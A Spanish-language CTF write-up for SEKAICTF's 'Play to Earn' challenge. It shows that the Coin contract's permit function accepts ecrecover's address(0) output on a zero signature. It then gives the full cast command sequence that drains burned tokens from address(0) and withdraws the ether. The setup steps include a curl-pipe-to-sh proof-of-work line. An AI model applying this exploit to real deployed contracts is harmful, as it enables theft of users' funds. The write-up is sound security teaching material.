<- SEKAICTF

Play to Earn

7 minutos de lectura

Se nos proporciona un Smart Contract llamado ArcadeMachine.sol:

pragma solidity 0.8.25;

import { Coin } from "./Coin.sol";

contract ArcadeMachine {

    Coin coin;

    constructor(Coin _coin) {
        coin = _coin;
    }

    function play(uint256 times) external {
        // burn the coins
        require(coin.transferFrom(msg.sender, address(0), 1 ether * times));
        // Have fun XD
    }

}

Y otro Smart Contract llamado Coin.sol:

pragma solidity 0.8.25;

import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/utils/cryptography/EIP712.sol";

contract Coin is Ownable, EIP712 {
    string public constant name     = "COIN";
    string public constant symbol   = "COIN";
    uint8  public constant decimals = 18;
    bytes32 constant PERMIT_TYPEHASH = keccak256(
        "Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"
    );

    event  Approval(address indexed src, address indexed guy, uint wad);
    event  Transfer(address indexed src, address indexed dst, uint wad);
    event  Deposit(address indexed dst, uint wad);
    event  Withdrawal(address indexed src, uint wad);
    event  PrivilegedWithdrawal(address indexed src, uint wad);

    mapping (address => uint)                       public  nonces;
    mapping (address => uint)                       public  balanceOf;
    mapping (address => mapping (address => uint))  public  allowance;

    constructor() Ownable(msg.sender) EIP712(name, "1") {}

    fallback() external payable {
        deposit();
    }

    function deposit() public payable {
        balanceOf[msg.sender] += msg.value;
        emit Deposit(msg.sender, msg.value);
    }

    function withdraw(uint wad) external {
        require(balanceOf[msg.sender] >= wad);
        balanceOf[msg.sender] -= wad;
        payable(msg.sender).transfer(wad);
        emit Withdrawal(msg.sender, wad);
    }

    function privilegedWithdraw() onlyOwner external {
        uint wad = balanceOf[address(0)];
        balanceOf[address(0)] = 0;
        payable(msg.sender).transfer(wad);
        emit PrivilegedWithdrawal(msg.sender, wad);
    }

    function totalSupply() public view returns (uint) {
        return address(this).balance;
    }

    function approve(address guy, uint wad) public returns (bool) {
        allowance[msg.sender][guy] = wad;
        emit Approval(msg.sender, guy, wad);
        return true;
    }

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external {
        require(block.timestamp <= deadline, "signature expired");
        bytes32 structHash = keccak256(
            abi.encode(PERMIT_TYPEHASH, owner, spender, value, nonces[owner]++, deadline)
        );
        bytes32 h = _hashTypedDataV4(structHash);
        address signer = ecrecover(h, v, r, s);
        require(signer == owner, "invalid signer");
        allowance[owner][spender] = value;
        emit Approval(owner, spender, value);
    }

    function transfer(address dst, uint wad) public returns (bool) {
        return transferFrom(msg.sender, dst, wad);
    }

    function transferFrom(address src, address dst, uint wad)
        public
        returns (bool)
    {
        require(balanceOf[src] >= wad);

        if (src != msg.sender && allowance[src][msg.sender] != type(uint256).max) {
            require(allowance[src][msg.sender] >= wad);
            allowance[src][msg.sender] -= wad;
        }

        balanceOf[src] -= wad;
        balanceOf[dst] += wad;

        emit Transfer(src, dst, wad);

        return true;
    }
}

Y este es Setup.sol:

pragma solidity 0.8.25;

import { Coin } from "./Coin.sol";
import { ArcadeMachine } from "./ArcadeMachine.sol";

contract Setup {

    Coin public coin;
    ArcadeMachine public arcadeMachine;

    address player;

    constructor() payable {
        coin = new Coin();
        arcadeMachine = new ArcadeMachine(coin);

        // Assume that many people have played before you ;)
        require(msg.value == 20 ether);
        coin.deposit{value: 20 ether}();
        coin.approve(address(arcadeMachine), 19 ether);
        arcadeMachine.play(19);
    }

    function register() external {
        require(player == address(0));
        player = msg.sender;
        coin.transfer(msg.sender, 1337);    // free coins for new players :)
    }

    function isSolved() external view returns (bool) {
        return player != address(0) && player.balance >= 13.37 ether;
    }
}

Configuración del entorno

En primer lugar, guardemos los parámetros de conexión como variables de entorno:

$ ncat --ssl play-to-earn.chals.sekai.team 1337
1 - launch new instance
2 - kill instance
3 - get flag
action? 1
curl -sSfL https://pwn.red/pow | sh -s s.AAATiA==.lBVBVVO53vx7N8dUODddBQ==
solution please: s.BFE2GqrKKFhmj7+6mKbW2pD9nFKsOCXgE4LrOdhtf6BJu6uZVVZUpgWQ7h6h083wh5tlnLAQukyir0tXOFAaX39O3MNsiY30lnzu/xecGdcLLozR8p0iYc1OeF0+wwG/kHl8kG9JIhsnsaAo3SdLAObhNhPLRIySTlE7qOrl9p6L/KD0SvRXXMxTviF7dMnDUIqU19JInoNCi8+JHKmt7Q==

your private blockchain has been deployed
it will automatically terminate in 30 minutes
here's some useful information
uuid:           decbdee7-b83f-4597-8390-a817c2d9498b
rpc endpoint:   https://play-to-earn.chals.sekai.team/decbdee7-b83f-4597-8390-a817c2d9498b
private key:    0x6351128ac11d06dc0e3c714e594994f432f324fe317078bfca64a117fad0e001
your address:   0xcA75Bb843EFC2fC19941B57BB2DbFAa0d889109c
setup contract: 0x2A94c6147f15cE2f4C92EeEFabc9b471020b8Fe1


Ncat: Input/output error.

$ export ETH_RPC_URL='https://play-to-earn.chals.sekai.team/decbdee7-b83f-4597-8390-a817c2d9498b'

$ PRIVATE_KEY='0x6351128ac11d06dc0e3c714e594994f432f324fe317078bfca64a117fad0e001'

$ ADDRESS='0xcA75Bb843EFC2fC19941B57BB2DbFAa0d889109c'

$ ADDRESS_SETUP='0x2A94c6147f15cE2f4C92EeEFabc9b471020b8Fe1'

$ cast call $ADDRESS_SETUP 'isSolved() (bool)'
false

Solución

Como se puede ver en Setup.sol, necesitamos que nuestra dirección de player esté definida y que tenga más de 13.37 ether como balance. La primera parte es fácil, solo necesitamos llamar a register. Para la segunda parte, necesitaremos analizar el Smart Contract Coin.

Una cosa que podemos hacer es obtener las direcciones de coin y arcadeMachine, ya sea desde el storage o llamando a los métodos públicos:

$ cast storage $ADDRESS_SETUP 0
0x000000000000000000000000c1c44b2a3f7ec00cc91646c62dc21ad74b90f85c

$ cast storage $ADDRESS_SETUP 1
0x00000000000000000000000077c92b748aa2ff38542d7d667a6c34afff1c2c86

$ cast storage $ADDRESS_SETUP 2
0x0000000000000000000000000000000000000000000000000000000000000000

$ cast call $ADDRESS_SETUP 'coin() (address)'
0xc1c44b2A3f7eC00cc91646C62dC21aD74B90f85c

$ cast call $ADDRESS_SETUP 'arcadeMachine() (address)'
0x77C92B748aA2ff38542D7d667a6C34aFff1c2c86

$ ADDRESS_COIN=$(cast call $ADDRESS_SETUP 'coin() (address)')

$ ADDRESS_ARCADE_MACHINE=$(cast call $ADDRESS_SETUP 'arcadeMachine() (address)')

Obsérvese cómo la dirección de player (índice 2 del storage) aún no está definida.

Este Smart Contract define algunos mapas nonces, balanceOf y allowance para gestionar transferencias de dinero:

    mapping (address => uint)                       public  nonces;
    mapping (address => uint)                       public  balanceOf;
    mapping (address => mapping (address => uint))  public  allowance;

De hecho, lo único que hace ArcadeMachine es transferir 19 ether para address(0) (llamado desde Setup):

    constructor(Coin _coin) {
        coin = _coin;
    }

    function play(uint256 times) external {
        // burn the coins
        require(coin.transferFrom(msg.sender, address(0), 1 ether * times));
        // Have fun XD
    }

Esto significa que dirección (0) tiene 19 ether como equilibrio:

$ cast call $ADDRESS_COIN 'balanceOf(address) (uint)' 0x0000000000000000000000000000000000000000
19000000000000000000

Aparte de approve:

    function approve(address guy, uint wad) public returns (bool) {
        allowance[msg.sender][guy] = wad;
        emit Approval(msg.sender, guy, wad);
        return true;
    }

Que simplemente establece el allowance de dinero de la dirección del emisor a otra dirección, tenemos un método similar para hacer casi lo mismo, que es permit:

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external {
        require(block.timestamp <= deadline, "signature expired");
        bytes32 structHash = keccak256(
            abi.encode(PERMIT_TYPEHASH, owner, spender, value, nonces[owner]++, deadline)
        );
        bytes32 h = _hashTypedDataV4(structHash);
        address signer = ecrecover(h, v, r, s);
        require(signer == owner, "invalid signer");
        allowance[owner][spender] = value;
        emit Approval(owner, spender, value);
    }

En esta función, podemos proporcionar la dirección del emisor para el mapa de allowance, pero necesitamos proporcionar una firma válida para eso, porque se verifica con ecrecover:

        address signer = ecrecover(h, v, r, s);
        require(signer == owner, "invalid signer");
        allowance[owner][spender] = value;

Sin embargo, según la documentación, ecrecover devolverá address(0) si hay un error. Podemos comprobarlo usando chisel:

$ chisel
Welcome to Chisel! Type `!help` to show available commands.
 ecrecover(0, 0, 0, 0)
Type: address
└ Data: 0x0000000000000000000000000000000000000000

Entonces, podemos enviar valores arbitrarios v, r, s para que la firma devuelva address(0) como resultado. Además, necesitamos enviar un número grande como deadline para aprobar esta comprobación require. Como resultado, podemos establecer el allowance necesario para enviarnos el dinero:

$ cast call $ADDRESS_COIN 'allowance(address, address) (uint)' 0x0000000000000000000000000000000000000000 $ADDRESS
0

$ cast send $ADDRESS_COIN 'permit(address, address, uint256, uint256, uint8, bytes32, bytes32)' 0x0000000000000000000000000000000000000000 $ADDRESS 19000000000000000000 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 0 0x0 0x0 --private-key $PRIVATE_KEY

blockHash               0x392e0a2c8dd6c8a23b2a111bc2b6478c70d214839d9ba5d431703f84f82bb0d8
blockNumber             3
contractAddress
cumulativeGasUsed       73634
effectiveGasPrice       3000000000
gasUsed                 73634
logs                    [{"address":"0xc1c44b2a3f7ec00cc91646c62dc21ad74b90f85c","topics":["0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925","0x0000000000000000000000000000000000000000000000000000000000000000","0x000000000000000000000000ca75bb843efc2fc19941b57bb2dbfaa0d889109c"],"data":"0x00000000000000000000000000000000000000000000000107ad8f556c6c0000","blockHash":"0x392e0a2c8dd6c8a23b2a111bc2b6478c70d214839d9ba5d431703f84f82bb0d8","blockNumber":"0x3","transactionHash":"0xb3a576d0678603bcfb33e2e50a2285872272e115d93c083d53593bd1948a543e","transactionIndex":"0x0","logIndex":"0x0","removed":false}]
logsBloom               0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000002000000000000000020000000000000000000800000000000800000004000000004000000000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000002000000000000008000000000000000000000000000000000000000000000020000010000000000000000000000000000000000000000000000000000000000000
root                    0x727d6d1aacf37d2e058e0441737b91a935d31d20418394741fcbe6bbf3f5013c
status                  1
transactionHash         0xb3a576d0678603bcfb33e2e50a2285872272e115d93c083d53593bd1948a543e
transactionIndex        0
type                    2

$ cast call $ADDRESS_COIN 'allowance(address, address) (uint)' 0x0000000000000000000000000000000000000000 $ADDRESS
19000000000000000000

Con esto, podemos usar transferFrom para obtener el dinero:

    function transferFrom(address src, address dst, uint wad)
        public
        returns (bool)
    {
        require(balanceOf[src] >= wad);

        if (src != msg.sender && allowance[src][msg.sender] != type(uint256).max) {
            require(allowance[src][msg.sender] >= wad);
            allowance[src][msg.sender] -= wad;
        }

        balanceOf[src] -= wad;
        balanceOf[dst] += wad;

        emit Transfer(src, dst, wad);

        return true;
    }

$ cast call $ADDRESS_COIN 'balanceOf(address) (uint)' $ADDRESS
0

$ cast send $ADDRESS_COIN 'transferFrom(address, address, uint)' 0x0000000000000000000000000000000000000000 $ADDRESS 19000000000000000000 --private-key $PRIVATE_KEY

blockHash               0x44fd7ebd12282e63e951a0bc4d17f7e72ca5be787dcf90846713ca6a6e0b36ec
blockNumber             4
contractAddress
cumulativeGasUsed       48198
effectiveGasPrice       3000000000
gasUsed                 48198
logs                    [{"address":"0xc1c44b2a3f7ec00cc91646c62dc21ad74b90f85c","topics":["0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef","0x0000000000000000000000000000000000000000000000000000000000000000","0x000000000000000000000000ca75bb843efc2fc19941b57bb2dbfaa0d889109c"],"data":"0x00000000000000000000000000000000000000000000000107ad8f556c6c0000","blockHash":"0x44fd7ebd12282e63e951a0bc4d17f7e72ca5be787dcf90846713ca6a6e0b36ec","blockNumber":"0x4","transactionHash":"0x1221741eb7587b4ba48180f0addd7597be78dd879b51ff3e8491c318462b7ff9","transactionIndex":"0x0","logIndex":"0x0","removed":false}]
logsBloom               0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000002000000000000000020000000000000000000800000000000800000004000010004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000002000008000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000000
root                    0x66d26901ad1e4aa8f45a69ac0a4c9f1b049afe468836fc3e5b89052d66f6b9f3
status                  1
transactionHash         0x1221741eb7587b4ba48180f0addd7597be78dd879b51ff3e8491c318462b7ff9
transactionIndex        0
type                    2

$ cast call $ADDRESS_COIN 'balanceOf(address) (uint)' $ADDRESS
19000000000000000000

Ahora, podemos registrar al jugador en Setup:

$ cast storage $ADDRESS_SETUP 2
0x0000000000000000000000000000000000000000000000000000000000000000

$ cast send $ADDRESS_SETUP 'register()' --private-key $PRIVATE_KEY

blockHash               0xfa794e74386154f46418b4b88ed2b109c3d7de35e132d2d7ab11672f49839273
blockNumber             6
contractAddress
cumulativeGasUsed       61572
effectiveGasPrice       3000000000
gasUsed                 61572
logs                    [{"address":"0xc1c44b2a3f7ec00cc91646c62dc21ad74b90f85c","topics":["0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef","0x0000000000000000000000002a94c6147f15ce2f4c92eeefabc9b471020b8fe1","0x000000000000000000000000ca75bb843efc2fc19941b57bb2dbfaa0d889109c"],"data":"0x0000000000000000000000000000000000000000000000000000000000000539","blockHash":"0xfa794e74386154f46418b4b88ed2b109c3d7de35e132d2d7ab11672f49839273","blockNumber":"0x6","transactionHash":"0x23cbc12fdd31cf4d6ba1474603156afedadc2a4355ee747fb64cce7bf00c17a5","transactionIndex":"0x0","logIndex":"0x0","removed":false}]
logsBloom               0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000002000000000000000000000000000000000000000000000000800000004800010004000000020000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000002000000002000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
root                    0x710f59649049ad45942e6a28ca4b44652f0f317b86f73e4cadf64865b11edfae
status                  1
transactionHash         0x23cbc12fdd31cf4d6ba1474603156afedadc2a4355ee747fb64cce7bf00c17a5
transactionIndex        0
type                    2

$ cast storage $ADDRESS_SETUP 2
0x000000000000000000000000ca75bb843efc2fc19941b57bb2dbfaa0d889109c

$ echo $ADDRESS
0xcA75Bb843EFC2fC19941B57BB2DbFAa0d889109c

Finalmente, retiramos algo de dinero de Coin para resolver el reto:

$ cast send $ADDRESS_COIN 'withdraw(uint)' 19000000000000000000 --private-key $PRIVATE_KEY

blockHash               0xa57f09bd138c32f2243afb0ded05b25417db0a19e0b6bf61139b005babe052c7
blockNumber             7
contractAddress
cumulativeGasUsed       35211
effectiveGasPrice       3000000000
gasUsed                 35211
logs                    [{"address":"0xc1c44b2a3f7ec00cc91646c62dc21ad74b90f85c","topics":["0x7fcf532c15f0a6db0bd6d0e038bea71d30d808c7d98cb3bf7268a95bf5081b65","0x000000000000000000000000ca75bb843efc2fc19941b57bb2dbfaa0d889109c"],"data":"0x00000000000000000000000000000000000000000000000107ad8f556c6c0000","blockHash":"0xa57f09bd138c32f2243afb0ded05b25417db0a19e0b6bf61139b005babe052c7","blockNumber":"0x7","transactionHash":"0x2e6f513c2145cf865796600b7acd155955cfea2d515da3590e9f1a557a142259","transactionIndex":"0x0","logIndex":"0x0","removed":false}]
logsBloom               0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000400000000000002000000000000000000000000000000000000000000000000800040004000000004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000008000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000000000000
root                    0x07943ff4ad081b92e626050d5701d6471ca174a7d8d3b7bffc63bf13c46edd20
status                  1
transactionHash         0x2e6f513c2145cf865796600b7acd155955cfea2d515da3590e9f1a557a142259
transactionIndex        0
type                    2

$ cast balance $ADDRESS --ether
19.999273799000000000

Flag

Una vez aquí, hemos resuelto el reto y podemos obtener la flag:

$ cast call $ADDRESS_SETUP 'isSolved() (bool)'
true

$ ncat --ssl play-to-earn.chals.sekai.team 1337
1 - launch new instance
2 - kill instance
3 - get flag
action? 3
uuid please: decbdee7-b83f-4597-8390-a817c2d9498b
SEKAI{0wn3r:wh3r3_4r3_mY_c01n5_:<}